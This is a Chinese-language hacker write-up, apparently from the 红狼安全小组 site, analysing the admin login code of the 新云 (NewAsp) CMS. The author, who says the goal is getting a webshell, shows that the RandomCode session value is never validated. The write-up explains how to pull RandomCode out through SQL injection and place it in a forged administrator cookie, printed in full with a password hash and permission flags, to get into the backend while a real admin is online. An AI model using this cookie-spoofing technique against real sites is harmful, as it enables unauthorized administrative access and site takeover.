新云小漏洞发现
信息来源:红狼安全小组(www.wolfexp.net)
文章作者:阿呆
最近玩新云时,在COOKIE欺骗的时候,经常会遇到已经有管理员在线,不允许多用户同时登陆,导致进不了后台,拿不了webshell,很是郁闷,下了新云的源码回来看了下。在 admin_login.asp文件里发现了个小问题,一起来看看(由于小弟ASP算不上入门,仅简单分析下,出错了别拿番茄炸我):
Sub logout()
'清除COOKIES中管理员身份的验证信息.
Session.Abandon
Session("AdminName") = ""
Session("AdminPass") = ""
Session("AdminGrade") = ""
Session("AdminFlag") = ""
Session("AdminStatus") = ""
Session("AdminID") = ""
Session("AdminRandomCode") = ""
Response.Cookies(Admin_Cookies_Name) = ""
Response.Redirect ("../")
End Sub
这里可以到,我们COOKIE提交的时候主要是提交AdminName,AdminPass,AdminGrade,AdminFlag, AdminStatus,AdminID,AdminRandomCode这几个参数,RandomCode是随机码,也就是登陆时验证管理员是否在线的参数。
Sub chklogin()
Dim adminname, password,RandomCode
adminname = Trim(Replace(Request("adminname"), "'", ""))
password = md5(Trim(Replace(Request("password"), "'", "")))
If Newasp.CheckPost = False Then
ErrMsg = ErrMsg + "您提交的数据不合法,请不要从外部提交登陆。"
Founderr = True
End If
If Newasp.IsValidStr(Request("adminname")) = False Then
ErrMsg = ErrMsg + "<li>用户名中含有非法字符。</li>"
Founderr = True
End If
If Newasp.IsValidPassword(Request("password")) = False Then
ErrMsg = ErrMsg + "<li>密码中含有非法字符。</li>"
Founderr = True
End If
If Request("verifycode") = "" Then
ErrMsg = ErrMsg + "<br>" + "<li>请返回输入确认码。</li>"
Founderr = True
ElseIf Session("getcode") = "9999" Then
Session("getcode") = ""
ErrMsg = ErrMsg + "<br>" + "<li>请不要重复提交,如需重新登陆请返回登陆页面。</li>"
Founderr = True
ElseIf CStr(Session("getcode"))<>CStr(Trim(Request("verifycode"))) Then
ErrMsg = ErrMsg + "<br>" + "<li>您输入的认码和系统产生的不一致,请重新输入。</li>"
Founderr = True
End If
Session("getcode") = ""
If adminname = "" Or password = "" Then
Founderr = True
ErrMsg = ErrMsg + "<br>" + "<li>请输入您的用户名或密码。</li>"
Exit Sub
End If
If Founderr = True Then Exit Sub
If Not IsObject(Conn) Then ConnectionDatabase
Set Rs = Server.CreateObject("ADODB.Recordset")
SQL = "select * from NC_Admin where password='" & password & "' And username='" & adminname & "'"
Rs.Open SQL, Conn, 1, 3
If Rs.BOF And Rs.EOF Then
FoundErr = True
ErrMsg = ErrMsg + "<li>您输入的用户名和密码不正确或者您不是系统管理员。!</li>"
Exit Sub
Else
If password <> Rs("password") Then
FoundErr = True
ErrMsg = ErrMsg + "<br><li>用户名或密码错误!!!</li>"
Exit Sub
End If
If Rs("isLock") <> 0 Or Rs("isLock") = "" Then
Founderr = True
ErrMsg = "<li>你的用户名已被锁定,你不能登陆!如要开通此帐号,请联系管理员。</li>"
Exit Sub
End If
End If
这里定义了三个变量adminname, password,RandomCode 可以看到,从事件开始到结束都没有对RandomCode变量进行判断。
接着看到:
RandomCode = Newasp.GetRandomCode
Rs("LoginTime") = Now()
Rs("Loginip") = Newasp.GetUserip
可以看到RandomCode变量是直接从数据库中提取赋值的。
也就是说,RandomCode存在于数据库中,并且程序对这个变量(随即码)没有进行任何判断。
实际运用:
我们在制造注入猜解的时候,在猜字段username,password,id时可以加猜一个RandomCode字段进行猜解,然后在提交的COOKIE中找到RandomCode把我们猜解出来的数据替换原来的
例:
ASPSESSIONIDCARADBTC=PPFHKFMBMFMGDOEIMKKPDFGL; admin%5Fnewasp=AdminStatus=%B8%DF%BC%B6%B9%DC%C0%ED%D4%B1&AdminID=1& Adminflag=SiteConfig%2CAdvertise%2CChannel%2CTemplate%2CTemplateLoad%2CAnnounce %2CAdminLog%2CSendMessage%2CCreateIndex%2CAddArticle1%2CAdminArticle1%2CAdminClass1% 2CSpecial1%2CCreateArticle1%2CComment1%2CAdminJsFile1%2CAdminUpload1%2CAdminSelect1% 2CAuditing1%2CAddSoft2%2CAdminSoft2%2CAdminClass2%2CSpecial2%2CCreateSoft2% 2CComment2%2CAdminJsFile2%2CAdminUpload2%2CAdminSelect2%2CAuditing2%2CDownServer2% 2CErrorSoft2%2CAddShop3%2CAdminShop3%2CAdminClass3%2CSpecial3%2CCreateShop3% 2CComment3%2CAdminJsFile3%2CAdminUpload3%2CAdminSelect3%2CAuditing3%2CAddArticle5% 2CAdminArticle5%2CAdminClass5%2CSpecial5%2CCreateArticle5%2CComment5%2CAdminJsFile5% 2CAdminUpload5%2CAdminSelect5%2CAuditing5%2CDownServer5%2CAddUser%2CAdminUser %2CChangePassword%2CUserGroup%2CMainList%2COnline%2CVote%2CFriendLink%2CArticleCollect %2CSoftCollect%2CUploadFile%2CRenameData%2CBackupData%2CRestoreData%2CCompressData %2CSpaceSize%2CBatchReplace&AdminGrade=999&AdminPass=9f7fa2c6858e1e77& RandomCode=(这里填写RandomCode值)&AdminName=admin
这样在提交时 不论管理员是否在线都可以直接登陆后台。
PS:文章分析的不是很专业,可能前辈们已经发现了这个漏洞,只是不愿公布,或者是公布了我没看到,总之,本着学习的精神与大家分享…